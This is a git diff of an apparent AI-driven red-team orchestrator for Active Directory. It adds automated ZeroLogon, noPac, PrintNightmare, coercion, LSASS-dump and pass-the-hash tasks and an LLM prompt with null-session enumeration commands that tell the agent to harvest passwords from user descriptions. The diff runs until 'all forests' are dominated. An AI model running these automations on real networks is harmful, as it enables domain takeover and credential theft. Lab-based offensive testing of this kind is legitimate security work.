.throttled_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + dc = %item.dc_ip, + domain = %item.domain, + "ZeroLogon check dispatched (CVE-2020-1472)" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_ZEROLOGON, item.dc_ip.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_ZEROLOGON, &item.dc_ip) + .await; + } + Ok(None) => { + debug!(dc = %item.dc_ip, "ZeroLogon check deferred by throttler"); + } + Err(e) => { + warn!(err = %e, dc = %item.dc_ip, "Failed to dispatch ZeroLogon check"); + } + } + } + } +} + +struct ZerologonWork { + domain: String, + dc_ip: String, + hostname: String, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::StateInner; + + fn make_host(ip: &str, hostname: &str, is_dc: bool) -> ares_core::models::Host { + ares_core::models::Host { + ip: ip.to_string(), + hostname: hostname.to_string(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc, + owned: false, + } + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_ZEROLOGON, "zerologon"); + } + + #[test] + fn dedup_key_is_dc_ip() { + // ZeroLogon dedup is by DC IP since we check each DC once + let dc_ip = "192.168.58.10"; + assert_eq!(dc_ip, "192.168.58.10"); + } + + #[test] + fn no_cred_required() { + // ZeroLogon check doesn't require credentials + let _payload = serde_json::json!({ + "technique": "zerologon_check", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "hostname": "dc01", + }); + } + + #[test] + fn hostname_extraction_empty_fallback() { + let hosts: Vec<(String, String)> = vec![]; + let dc_ip = "192.168.58.10"; + let hostname = hosts + .iter() + .find(|(ip, _)| ip == dc_ip) + .map(|(_, h)| h.clone()) + .unwrap_or_default(); + assert_eq!(hostname, ""); + } + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_zerologon_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_dc_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_zerologon_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + } + + #[test] + fn collect_multiple_dcs_produces_work_for_each() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + let work = collect_zerologon_work(&state); + assert_eq!(work.len(), 2); + let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect(); + assert!(domains.contains(&"contoso.local")); + assert!(domains.contains(&"fabrikam.local")); + } + + #[test] + fn collect_dedup_skips_already_processed_dc() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.mark_processed(DEDUP_ZEROLOGON, "192.168.58.10".into()); + let work = collect_zerologon_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_processed_keeps_unprocessed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state.mark_processed(DEDUP_ZEROLOGON, "192.168.58.10".into()); + let work = collect_zerologon_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[test] + fn collect_resolves_hostname_from_hosts() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .hosts + .push(make_host("192.168.58.10", "dc01.contoso.local", true)); + let work = collect_zerologon_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].hostname, "dc01.contoso.local"); + } + + #[test] + fn collect_hostname_empty_when_host_not_found() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // No matching host in state.hosts + state + .hosts + .push(make_host("192.168.58.99", "other.contoso.local", false)); + let work = collect_zerologon_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].hostname, ""); + } + + #[test] + fn collect_no_credentials_still_produces_work() { + // ZeroLogon is unauthenticated, so no credentials needed + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + assert!(state.credentials.is_empty()); + let work = collect_zerologon_work(&state); + assert_eq!(work.len(), 1); + } +} diff --git a/ares-cli/src/orchestrator/automation_spawner.rs b/ares-cli/src/orchestrator/automation_spawner.rs index 8278ea53..c8be2896 100644 --- a/ares-cli/src/orchestrator/automation_spawner.rs +++ b/ares-cli/src/orchestrator/automation_spawner.rs @@ -48,6 +48,41 @@ pub(crate) fn spawn_automation_tasks( spawn_auto!(auto_mssql_exploitation); spawn_auto!(auto_gpo_abuse); spawn_auto!(auto_laps_extraction); + spawn_auto!(auto_ntlm_relay); + spawn_auto!(auto_nopac); + spawn_auto!(auto_zerologon); + spawn_auto!(auto_print_nightmare); + spawn_auto!(auto_smb_signing_detection); + spawn_auto!(auto_share_coercion); + spawn_auto!(auto_mssql_coercion); + spawn_auto!(auto_password_policy); + spawn_auto!(auto_gpp_sysvol); + spawn_auto!(auto_ntlmv1_downgrade); + spawn_auto!(auto_ldap_signing); + spawn_auto!(auto_webdav_detection); + spawn_auto!(auto_spooler_check); + spawn_auto!(auto_machine_account_quota); + spawn_auto!(auto_dfs_coercion); + spawn_auto!(auto_petitpotam_unauth); + spawn_auto!(auto_winrm_lateral); + spawn_auto!(auto_group_enumeration); + spawn_auto!(auto_localuser_spray); + spawn_auto!(auto_krbrelayup); + spawn_auto!(auto_searchconnector_coercion); + spawn_auto!(auto_lsassy_dump); + spawn_auto!(auto_rdp_lateral); + spawn_auto!(auto_foreign_group_enum); + spawn_auto!(auto_certipy_auth); + spawn_auto!(auto_golden_cert); + spawn_auto!(auto_sid_enumeration); + spawn_auto!(auto_dns_enum); + spawn_auto!(auto_domain_user_enum); + spawn_auto!(auto_pth_spray); + spawn_auto!(auto_certifried); + spawn_auto!(auto_dacl_abuse); + spawn_auto!(auto_smbclient_enum); + spawn_auto!(auto_acl_discovery); + spawn_auto!(auto_cross_forest_enum); info!(count = handles.len(), "Automation tasks spawned"); handles diff --git a/ares-cli/src/orchestrator/blue/investigation.rs b/ares-cli/src/orchestrator/blue/investigation.rs index 7c9b5331..f673795e 100644 --- a/ares-cli/src/orchestrator/blue/investigation.rs +++ b/ares-cli/src/orchestrator/blue/investigation.rs @@ -551,6 +551,7 @@ mod tests { steps: 10, tool_calls_dispatched: 5, discoveries: Vec::new(), + llm_findings: Vec::new(), tool_outputs: Vec::new(), }; match process_outcome(&outcome, "inv1") { @@ -573,6 +574,7 @@ mod tests { steps: 3, tool_calls_dispatched: 1, discoveries: Vec::new(), + llm_findings: Vec::new(), tool_outputs: Vec::new(), }; match process_outcome(&outcome, "inv1") { diff --git a/ares-cli/src/orchestrator/bootstrap.rs b/ares-cli/src/orchestrator/bootstrap.rs index bee94e47..7b3ae071 100644 --- a/ares-cli/src/orchestrator/bootstrap.rs +++ b/ares-cli/src/orchestrator/bootstrap.rs @@ -8,11 +8,12 @@ use crate::orchestrator::config::OrchestratorConfig; use crate::orchestrator::dispatcher::Dispatcher; use crate::orchestrator::task_queue::TaskQueue; -/// Probe target IPs on port 88 (Kerberos) then 389 (LDAP) to find a real DC. -/// Returns the first IP that accepts a TCP connection within 500ms. -pub(crate) async fn probe_dc_port(ips: &[String]) -> Option { - for port in [88u16, 389] { - for ip in ips { +/// Probe ALL target IPs on ports 88 (Kerberos) and 389 (LDAP) to find every DC. +/// Returns all IPs that accept a TCP connection within 500ms on either port. +pub(crate) async fn probe_all_dcs(ips: &[String]) -> Vec { + let mut dc_ips = Vec::new(); + for ip in ips { + for port in [88u16, 389] { let addr = format!("{ip}:{port}"); if let Ok(Ok(_)) = tokio::time::timeout( std::time::Duration::from_millis(500), @@ -21,11 +22,186 @@ pub(crate) async fn probe_dc_port(ips: &[String]) -> Option { .await { info!(ip = %ip, port = port, "DC probe: port open"); - return Some(ip.clone()); + dc_ips.push(ip.clone()); + break; // Found open port, skip remaining ports for this IP } } } - None + dc_ips +} + +/// Query a DC's LDAP rootDSE to discover its domain name. +/// +/// Sends a minimal anonymous LDAP SearchRequest for `defaultNamingContext`, +/// parses the DN response (e.g. `DC=child,DC=contoso,DC=local`), and +/// converts it to a domain name (`child.contoso.local`). +/// +/// Returns `None` if the connection fails, the DC doesn't respond, or the +/// response doesn't contain a parseable `defaultNamingContext`. +pub(crate) async fn query_dc_domain(ip: &str) -> Option { + use tokio::io::{AsyncReadExt, AsyncWriteExt}; + + // Pre-built LDAP SearchRequest: + // messageId=1, base="", scope=baseObject, filter=present(objectClass), + // attributes=[defaultNamingContext] + #[rustfmt::skip] + let ldap_request: &[u8] = &[ + 0x30, 0x3b, // SEQUENCE, length 59 + 0x02, 0x01, 0x01, // INTEGER messageId = 1 + 0x63, 0x36, // APPLICATION[3] SearchRequest, length 54 + 0x04, 0x00, // baseObject = "" + 0x0a, 0x01, 0x00, // scope = baseObject (0) + 0x0a, 0x01, 0x00, // derefAliases = neverDeref (0) + 0x02, 0x01, 0x00, // sizeLimit = 0 + 0x02, 0x01, 0x05, // timeLimit = 5 + 0x01, 0x01, 0x00, // typesOnly = false + 0x87, 0x0b, // present filter, length 11 + b'o', b'b', b'j', b'e', b'c', b't', b'C', b'l', b'a', b's', b's', + 0x30, 0x16, // attributes SEQUENCE, length 22 + 0x04, 0x14, // OCTET STRING, length 20 + b'd', b'e', b'f', b'a', b'u', b'l', b't', b'N', b'a', b'm', b'i', + b'n', b'g', b'C', b'o', b'n', b't', b'e', b'x', b't', + ]; + + let addr = format!("{ip}:389"); + let mut stream = match tokio::time::timeout( + std::time::Duration::from_millis(1000), + tokio::net::TcpStream::connect(&addr), + ) + .await + { + Ok(Ok(s)) => s, + _ => { + warn!(ip = %ip, "LDAP rootDSE: connection failed"); + return None; + } + }; + + if stream.write_all(ldap_request).await.is_err() { + return None; + } + + let mut buf = vec![0u8; 4096]; + let n = match tokio::time::timeout( + std::time::Duration::from_millis(2000), + stream.read(&mut buf), + ) + .await + { + Ok(Ok(n)) if n > 0 => n, + _ => return None, + }; + + let domain = parse_dn_from_ldap_response(&buf[..n]); + if let Some(ref d) = domain { + info!(ip = %ip, domain = %d, "LDAP rootDSE: discovered DC domain"); + } else { + warn!(ip = %ip, "LDAP rootDSE: could not parse defaultNamingContext"); + } + domain +} + +/// Parse `defaultNamingContext` DN from raw LDAP response bytes. +/// +/// Locates the `defaultNamingContext` attribute name, then finds the subsequent +/// DN value containing `DC=` components and converts it to a domain name. +/// +/// Uses the BER OCTET STRING length prefix immediately preceding the `DC=` +/// payload as the authoritative end-of-DN marker. Without this, a printable-byte +/// scan would happily consume the next BER tag (0x30 SEQUENCE = ASCII '0'), +/// producing phantom domains like `contoso.local0` that poison downstream state. +fn parse_dn_from_ldap_response(data: &[u8]) -> Option { + let attr_name = b"defaultNamingContext"; + let pos = data.windows(attr_name.len()).position(|w| w == attr_name)?; + + // After the attribute name, scan forward for "DC=" which starts the DN value + let remaining = &data[pos + attr_name.len()..]; + let dc_pos = remaining + .windows(3) + .position(|w| w.eq_ignore_ascii_case(b"DC="))?; + + let dn_start = pos + attr_name.len() + dc_pos; + + // Prefer the BER OCTET STRING length prefix (the byte immediately before + // `DC=`) for the DN length. Short-form only (high bit clear, non-zero). + let mut dn_end = dn_start; + if dc_pos > 0 { + let length_byte = remaining[dc_pos - 1]; + if length_byte & 0x80 == 0 && length_byte > 0 { + let length = length_byte as usize; + if let Some(end) = dn_start.checked_add(length) { + if end <= data.len() { + dn_end = end; + } + } + } + } + + // Fallback: walk only DN-legal characters (alphanumeric, `=`, `,`, `-`). + // Stops before BER tag bytes (e.g. 0x30) that happen to be ASCII printable. + if dn_end == dn_start { + dn_end = dn_start; + while dn_end < data.len() { + let b = data[dn_end]; + let is_dn_char = b.is_ascii_alphanumeric() || matches!(b, b'=' | b',' | b'-' | b'.'); + if !is_dn_char { + break; + } + dn_end += 1; + } + } + + let dn_str = std::str::from_utf8(&data[dn_start..dn_end]).ok()?; + dn_to_domain(dn_str) +} + +/// Convert an LDAP DN like `DC=child,DC=contoso,DC=local` to `child.contoso.local`. +fn dn_to_domain(dn: &str) -> Option { + let parts: Vec<&str> = dn + .split(',') + .filter_map(|component| { + let component = component.trim(); + if component.len() > 3 && component[..3].eq_ignore_ascii_case("DC=") { + Some(&component[3..]) + } else { + None + } + }) + .collect(); + + if parts.is_empty() { + return None; + } + Some(parts.join(".").to_lowercase()) +} + +/// Discover all DCs and their domains from target IPs. +/// +/// 1. Probes all IPs on ports 88/389 to find DCs +/// 2. Queries each DC's LDAP rootDSE to discover its actual domain +/// 3. Falls back to `fallback_domain` if LDAP query fails +/// +/// Returns `Vec<(domain, ip)>` with one entry per unique domain. +pub(crate) async fn discover_dc_domains( + ips: &[String], + fallback_domain: &str, +) -> Vec<(String, String)> { + let dc_ips = probe_all_dcs(ips).await; + let mut results = Vec::new(); + let mut seen_domains = std::collections::HashSet::new(); + + for ip in &dc_ips { + let domain = query_dc_domain(ip) + .await + .unwrap_or_else(|| fallback_domain.to_lowercase()); + + // First DC for each domain wins — skip duplicates (e.g. redundant DCs) + if seen_domains.insert(domain.clone()) { + results.push((domain, ip.clone())); + } + } + + results } /// Write initial operation metadata to Redis so workers can discover the operation. @@ -144,11 +320,43 @@ pub(crate) async fn dispatch_initial_recon( let payload = serde_json::json!({ "target_ip": ip, "domain": domain, + "technique": "user_enumeration", "techniques": ["user_enumeration"], "null_session": true, + "instructions": concat!( + "Enumerate domain users via UNAUTHENTICATED methods. This is a bootstrap task ", + "— we have NO credentials yet. Try these techniques in order:\n\n", + "1. Anonymous LDAP bind to enumerate users and their descriptions:\n", + " ldapsearch -x -H ldap:// -b 'DC=' ", + "'(objectClass=user)' sAMAccountName description userPrincipalName\n\n", + "2. RPC null session user enumeration:\n", + " rpcclient -U '' -N -c 'enumdomusers'\n", + " Then for each user: rpcclient -U '' -N -c 'queryuser '\n\n", + "3. Impacket lookupsid.py with anonymous:\n", + " lookupsid.py anonymous@ -no-pass -domain-sids\n\n", + "4. Impacket GetADUsers.py with anonymous:\n", + " GetADUsers.py -all -dc-ip / 2>/dev/null\n\n", + "5. enum4linux-ng for comprehensive SMB/RPC enumeration:\n", + " enum4linux-ng -A \n\n", + "CRITICAL: Look for passwords in user DESCRIPTION fields! In many AD environments, ", + "admins store passwords in the description attribute. For each user found, report ", + "the description field content. If a description looks like a password (short string, ", + "special chars, etc.), report it as a discovered credential:\n", + " {\"username\": \"samaccountname\", \"password\": \"\", ", + "\"domain\": \"\", \"source\": \"desc_enumeration\"}\n\n", + "IMPORTANT: The 'domain' field for credentials and users MUST be the AD domain the user ", + "belongs to (look at userPrincipalName suffix, or the domain reported by LDAP/RPC), NOT ", + "the local machine name or workgroup. If the target is a DC for 'contoso.local', ", + "users belong to 'contoso.local'. Use the 'domain' field from this task's payload ", + "as the default domain unless evidence shows otherwise.\n\n", + "Also report ALL discovered users in the discovered_users array:\n", + " {\"username\": \"samaccountname\", \"domain\": \"\", ", + "\"source\": \"user_enumeration\"}\n\n", + "If the target is not a DC (no LDAP/Kerberos), just report that and complete." + ), }); match dispatcher - .throttled_submit("recon", "recon", payload, 5) + .throttled_submit("recon", "recon", payload, 1) .await { Ok(Some(task_id)) => { @@ -162,3 +370,142 @@ pub(crate) async fn dispatch_initial_recon( count } + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dn_to_domain_child() { + assert_eq!( + dn_to_domain("DC=child,DC=contoso,DC=local"), + Some("child.contoso.local".to_string()) + ); + } + + #[test] + fn dn_to_domain_root() { + assert_eq!( + dn_to_domain("DC=contoso,DC=local"), + Some("contoso.local".to_string()) + ); + } + + #[test] + fn dn_to_domain_single_component() { + assert_eq!(dn_to_domain("DC=local"), Some("local".to_string())); + } + + #[test] + fn dn_to_domain_case_insensitive() { + assert_eq!( + dn_to_domain("dc=CONTOSO,dc=LOCAL"), + Some("contoso.local".to_string()) + ); + } + + #[test] + fn dn_to_domain_with_spaces() { + assert_eq!( + dn_to_domain("DC=child, DC=contoso, DC=local"), + Some("child.contoso.local".to_string()) + ); + } + + #[test] + fn dn_to_domain_mixed_components() { + // DN with OU components should only extract DC parts + assert_eq!( + dn_to_domain("OU=Users,DC=contoso,DC=local"), + Some("contoso.local".to_string()) + ); + } + + #[test] + fn dn_to_domain_empty() { + assert_eq!(dn_to_domain(""), None); + } + + #[test] + fn dn_to_domain_no_dc() { + assert_eq!(dn_to_domain("OU=Users,CN=admin"), None); + } + + #[test] + fn parse_dn_from_ldap_response_realistic() { + // Simulate a response containing the attribute name followed by a BER-encoded value + let mut data = Vec::new(); + data.extend_from_slice(b"\x30\x50\x02\x01\x01\x64\x4b"); // LDAP envelope + data.extend_from_slice(b"\x04\x00"); // objectName="" + data.extend_from_slice(b"\x30\x45"); // attributes SEQUENCE + data.extend_from_slice(b"\x30\x43"); // partial attribute SEQUENCE + data.extend_from_slice(b"\x04\x14"); // type OCTET STRING, len 20 + data.extend_from_slice(b"defaultNamingContext"); + data.extend_from_slice(b"\x31\x29"); // vals SET, len 41 + data.extend_from_slice(b"\x04\x27"); // value OCTET STRING, len 39 + data.extend_from_slice(b"DC=child,DC=contoso,DC=local"); + data.push(0x00); // null terminator (end of printable range) + + assert_eq!( + parse_dn_from_ldap_response(&data), + Some("child.contoso.local".to_string()) + ); + } + + #[test] + fn parse_dn_from_ldap_response_root_domain() { + let mut data = Vec::new(); + data.extend_from_slice(b"\x30\x40\x02\x01\x01\x64\x3b"); + data.extend_from_slice(b"\x04\x00"); + data.extend_from_slice(b"\x30\x35\x30\x33"); + data.extend_from_slice(b"\x04\x14"); + data.extend_from_slice(b"defaultNamingContext"); + data.extend_from_slice(b"\x31\x19\x04\x17"); + data.extend_from_slice(b"DC=contoso,DC=local"); + data.push(0x00); + + assert_eq!( + parse_dn_from_ldap_response(&data), + Some("contoso.local".to_string()) + ); + } + + #[test] + fn parse_dn_from_ldap_response_no_attr() { + let data = b"\x30\x10\x02\x01\x01\x04\x0bsomethingElse"; + assert_eq!(parse_dn_from_ldap_response(data), None); + } + + #[test] + fn parse_dn_from_ldap_response_no_dc() { + let mut data = Vec::new(); + data.extend_from_slice(b"\x04\x14"); + data.extend_from_slice(b"defaultNamingContext"); + data.extend_from_slice(b"\x31\x0a\x04\x08"); + data.extend_from_slice(b"OU=Users"); // No DC= in value + data.push(0x00); + + assert_eq!(parse_dn_from_ldap_response(&data), None); + } + + /// Regression: the OCTET STRING value MUST be bounded by its BER length + /// prefix. Without that bound, a printable-byte scan happily consumes the + /// next BER SEQUENCE tag (0x30 = ASCII '0'), producing phantom domains + /// like `contoso.local0` that poison the orchestrator's `domain_controllers` + /// keys and make the completion loop's required-forest set unsatisfiable. + #[test] + fn parse_dn_from_ldap_response_does_not_bleed_into_next_ber_tag() { + let mut data = Vec::new(); + data.extend_from_slice(b"\x04\x14"); + data.extend_from_slice(b"defaultNamingContext"); + data.extend_from_slice(b"\x31\x15\x04\x13"); // SET len 21, OCTET STRING len 19 + data.extend_from_slice(b"DC=contoso,DC=local"); // exactly 19 bytes + data.extend_from_slice(b"\x30\x10"); // next SEQUENCE: tag 0x30 ('0'), len 0x10 + data.extend_from_slice(b"trailingjunk"); + + assert_eq!( + parse_dn_from_ldap_response(&data), + Some("contoso.local".to_string()) + ); + } +} diff --git a/ares-cli/src/orchestrator/callback_handler/dispatch.rs b/ares-cli/src/orchestrator/callback_handler/dispatch.rs index 5384e179..ccf0bb52 100644 --- a/ares-cli/src/orchestrator/callback_handler/dispatch.rs +++ b/ares-cli/src/orchestrator/callback_handler/dispatch.rs @@ -102,6 +102,42 @@ impl OrchestratorCallbackHandler { attack_step: 0, }; + // Pre-check cross-realm so the LLM gets a clear "dead-end" message + // rather than a misleading "queued" when request_lateral silently rejects. + let target_realm = { + let state = self.state.read().await; + state + .hosts + .iter() + .find(|h| h.ip == target_ip) + .and_then(|h| h.hostname.split_once('.').map(|(_, d)| d.to_lowercase())) + }; + if let Some(td) = target_realm { + let cd = domain.to_lowercase(); + if !cd.is_empty() + && cd != td + && !td.ends_with(&format!(".{cd}")) + && !cd.ends_with(&format!(".{td}")) + { + warn!( + target_ip = target_ip, + target_realm = %td, + cred_domain = %cd, + cred_user = username, + technique = technique, + "Rejecting cross-realm lateral from LLM — returning dead-end message" + ); + return Ok(CallbackResult::Continue(format!( + "REJECTED: cross-realm lateral movement ({cd} cred → {td} target at {target_ip}) \ + will not work. Windows strips ExtraSid RID<1000 across forests, and same-realm \ + auth is required for SMB/WMI/PSExec. DO NOT retry this combination with any \ + {technique}/pth_*/smbexec/wmiexec/psexec variant. Instead: dispatch \ + forest_trust_escalation, exploit ESC8/MSSQL/ACL paths to acquire a \ + {td}-realm credential, or pivot via FSP membership." + ))); + } + } + let task_id = dispatcher .request_lateral(target_ip, &cred, technique) .await?; diff --git a/ares-cli/src/orchestrator/completion.rs b/ares-cli/src/orchestrator/completion.rs index 32cc293a..64c79776 100644 --- a/ares-cli/src/orchestrator/completion.rs +++ b/ares-cli/src/orchestrator/completion.rs @@ -206,10 +206,42 @@ pub async fn wait_for_completion( None // Continue — waiting for golden ticket } } else { - // Default: continue until all forests are dominated + // Default: continue until all forests are dominated, + // then allow a post-exploitation grace period for group/ACL/ADCS + // enumeration to complete. let remaining = undominated_forests(state).await; if remaining.is_empty() { - Some("all forests dominated") + // Grace period: continue for 180s after all forests dominated + // to allow post-exploitation automation (group enum, ACL + // discovery, ADCS enumeration) to fire and complete. + // 180s needed because: automations check on 20-60s intervals, + // domain hashes may arrive late, and LLM tasks need time to + // complete LDAP queries. + let inner = state.read().await; + let all_dominated_at = inner.all_forests_dominated_at; + drop(inner); + if let Some(dominated_at) = all_dominated_at { + let grace = Duration::from_secs(180); + let since = dominated_at.elapsed(); + if since >= grace { + Some("all forests dominated (post-exploitation complete)") + } else { + debug!( + remaining_secs = (grace - since).as_secs(), + "All forests dominated — post-exploitation grace period" + ); + None // Still in grace period + } + } else { + // First time we see all forests dominated — record the timestamp + let mut inner = state.write().await; + inner.all_forests_dominated_at = Some(tokio::time::Instant::now()); + drop(inner); + info!( + "All forests dominated — starting 90s post-exploitation grace period" + ); + None + } } else { debug!( undominated = ?remaining, @@ -303,6 +335,43 @@ pub async fn wait_for_completion( } } + // Wait for active red team tasks and deferred queue to drain + // before signalling shutdown. Cap at 5 minutes to avoid hanging. + let red_deadline = tokio::time::Instant::now() + Duration::from_secs(300); + loop { + if *shutdown_rx.borrow() { + info!("Completion monitor interrupted by shutdown while waiting for red team drain"); + break; + } + + if tokio::time::Instant::now() >= red_deadline { + warn!("Red team drain deadline reached (5m) — proceeding with shutdown"); + break; + } + + let active_tasks = dispatcher.tracker.total().await; + let deferred_tasks = dispatcher.deferred.total_count().await; + + if active_tasks == 0 && deferred_tasks == 0 { + info!("All red team tasks drained"); + break; + } + + info!( + active_tasks, + deferred_tasks, "Waiting for red team tasks to drain before shutdown..." + ); + + tokio::select! { + _ = tokio::time::sleep(Duration::from_secs(10)) => {} + _ = shutdown_rx.changed() => { + if *shutdown_rx.borrow() { + break; + } + } + } + } + // Signal the main loop to stop via Redis so it breaks out of its // select! within the next 5-second poll cycle. { diff --git a/ares-cli/src/orchestrator/config.rs b/ares-cli/src/orchestrator/config.rs index 1b467b58..0585cbd7 100644 --- a/ares-cli/src/orchestrator/config.rs +++ b/ares-cli/src/orchestrator/config.rs @@ -181,7 +181,7 @@ impl OrchestratorConfig { .ok() .or_else(|| detect_local_ip(target_ips.first().map(|s| s.as_str()))); - let max_concurrent_tasks = parse_env("ARES_MAX_CONCURRENT_TASKS", 8); + let max_concurrent_tasks = parse_env("ARES_MAX_CONCURRENT_TASKS", 12); let heartbeat_interval_secs = parse_env("ARES_HEARTBEAT_INTERVAL_SECS", 30); let heartbeat_timeout_secs = parse_env("ARES_HEARTBEAT_TIMEOUT_SECS", 120); let result_poll_interval_ms = parse_env("ARES_RESULT_POLL_INTERVAL_MS", 500); @@ -338,7 +338,7 @@ mod tests { std::env::set_var("ARES_OPERATION_ID", "test-op-1"); let c = OrchestratorConfig::from_env().unwrap(); assert_eq!(c.operation_id, "test-op-1"); - assert_eq!(c.max_concurrent_tasks, 8); + assert_eq!(c.max_concurrent_tasks, 12); assert_eq!(c.heartbeat_interval, Duration::from_secs(30)); assert!(c.target_ips.is_empty()); assert!(c.initial_credential.is_none()); diff --git a/ares-cli/src/orchestrator/deferred.rs b/ares-cli/src/orchestrator/deferred.rs index 48b1b111..0ade788b 100644 --- a/ares-cli/src/orchestrator/deferred.rs +++ b/ares-cli/src/orchestrator/deferred.rs @@ -194,6 +194,23 @@ impl DeferredQueue { Ok(total_evicted) } + /// Total number of deferred tasks across all type ZSETs. + pub async fn total_count(&self) -> usize { + let pattern = format!("{}:{}:*", DEFERRED_QUEUE_PREFIX, self.config.operation_id); + let mut conn = self.queue_conn(); + let keys: Vec = scan_keys_async(&mut conn, &pattern).await; + let mut total = 0_usize; + for key in &keys { + let count: usize = redis::cmd("ZCARD") + .arg(key) + .query_async(&mut conn) + .await + .unwrap_or(0); + total += count; + } + total + } + fn queue_conn(&self) -> redis::aio::ConnectionManager { // TaskQueue wraps a ConnectionManager which implements Clone cheaply // We access it through an internal method. diff --git a/ares-cli/src/orchestrator/dispatcher/submission.rs b/ares-cli/src/orchestrator/dispatcher/submission.rs index fd6d0acb..2096e127 100644 --- a/ares-cli/src/orchestrator/dispatcher/submission.rs +++ b/ares-cli/src/orchestrator/dispatcher/submission.rs @@ -92,6 +92,21 @@ impl Dispatcher { } } + /// Submit bypassing the throttle soft/hard cap. Used by automations + /// whose tasks are small (single LDAP query) and must not be blocked by + /// long-running initial recon. Still routes through `do_submit` which + /// respects the per-role semaphore. + pub async fn force_submit( + &self, + task_type: &str, + target_role: &str, + payload: serde_json::Value, + priority: i32, + ) -> Result> { + self.do_submit(task_type, target_role, payload, priority) + .await + } + /// Direct submit (bypasses throttle). Returns task_id. /// /// Routes the task to the Rust LLM agent loop. Prefers `target_role` @@ -208,6 +223,13 @@ impl Dispatcher { if let Some(ref key) = cred_key { task_params.insert("credential_key".to_string(), serde_json::json!(key)); } + // Propagate task metadata so process_completed_task can access them + // (mark_host_owned needs target_ip, domain attribution needs domain). + for key in &["target_ip", "domain"] { + if let Some(val) = payload.get(*key) { + task_params.insert(key.to_string(), val.clone()); + } + } let task_info = ares_core::models::TaskInfo { task_id: task_id.clone(), task_type: task_type.to_string(), @@ -253,6 +275,17 @@ impl Dispatcher { Some(ares_tools::parsers::merge_discoveries(&outcome.discoveries)) }; + // LLM-fabricated findings (`report_finding`, + // `report_lateral_success`) are kept on a SEPARATE field so + // `extract_discoveries` (which only reads "discoveries") + // never feeds them into `publish_*` state writes. Reports + // surface them under `llm_findings` for context only. + let llm_findings_json: Option = if outcome.llm_findings.is_empty() { + None + } else { + Some(Value::Array(outcome.llm_findings.clone())) + }; + // Collect raw tool outputs for secondary regex extraction let tool_outputs_json: Vec = outcome .tool_outputs @@ -291,13 +324,18 @@ impl Dispatcher { // The LLM's task_complete result is untrusted prose — // any discovery-like keys it contains are ignored. // Only ares-tools parsers (run on real tool stdout) - // produce authoritative discoveries. + // produce authoritative discoveries. LLM-fabricated + // findings live on a separate `llm_findings` field. if let Some(obj) = result_json.as_object_mut() { obj.remove("discoveries"); + obj.remove("llm_findings"); } if let Some(disc) = merged_discoveries { result_json["discoveries"] = disc; } + if let Some(findings) = llm_findings_json.clone() { + result_json["llm_findings"] = findings; + } if !tool_outputs_json.is_empty() { result_json["tool_outputs"] = Value::Array(tool_outputs_json.clone()); @@ -320,6 +358,9 @@ impl Dispatcher { if let Some(disc) = merged_discoveries { result_json["discoveries"] = disc; } + if let Some(findings) = llm_findings_json.clone() { + result_json["llm_findings"] = findings; + } if !tool_outputs_json.is_empty() { result_json["tool_outputs"] = Value::Array(tool_outputs_json.clone()); @@ -344,6 +385,9 @@ impl Dispatcher { if let Some(disc) = merged_discoveries { result_json["discoveries"] = disc; } + if let Some(findings) = llm_findings_json.clone() { + result_json["llm_findings"] = findings; + } if !tool_outputs_json.is_empty() { result_json["tool_outputs"] = Value::Array(tool_outputs_json.clone()); @@ -363,6 +407,9 @@ impl Dispatcher { if let Some(disc) = merged_discoveries { result_json["discoveries"] = disc; } + if let Some(findings) = llm_findings_json.clone() { + result_json["llm_findings"] = findings; + } if !tool_outputs_json.is_empty() { result_json["tool_outputs"] = Value::Array(tool_outputs_json.clone()); @@ -385,6 +432,9 @@ impl Dispatcher { if let Some(disc) = merged_discoveries { result_json["discoveries"] = disc; } + if let Some(findings) = llm_findings_json.clone() { + result_json["llm_findings"] = findings; + } if !tool_outputs_json.is_empty() { result_json["tool_outputs"] = Value::Array(tool_outputs_json.clone()); diff --git a/ares-cli/src/orchestrator/dispatcher/task_builders.rs b/ares-cli/src/orchestrator/dispatcher/task_builders.rs index 06b8c01f..bba89473 100644 --- a/ares-cli/src/orchestrator/dispatcher/task_builders.rs +++ b/ares-cli/src/orchestrator/dispatcher/task_builders.rs @@ -4,7 +4,7 @@ use anyhow::Result; use serde_json::json; use tracing::{debug, info}; -use crate::orchestrator::state::DEDUP_SCANNED_TARGETS; +use crate::orchestrator::state::{DEDUP_CROSS_REALM_LATERAL, DEDUP_SCANNED_TARGETS}; use super::Dispatcher; @@ -219,12 +219,75 @@ impl Dispatcher { } /// Submit a lateral movement task. + /// + /// Refuses 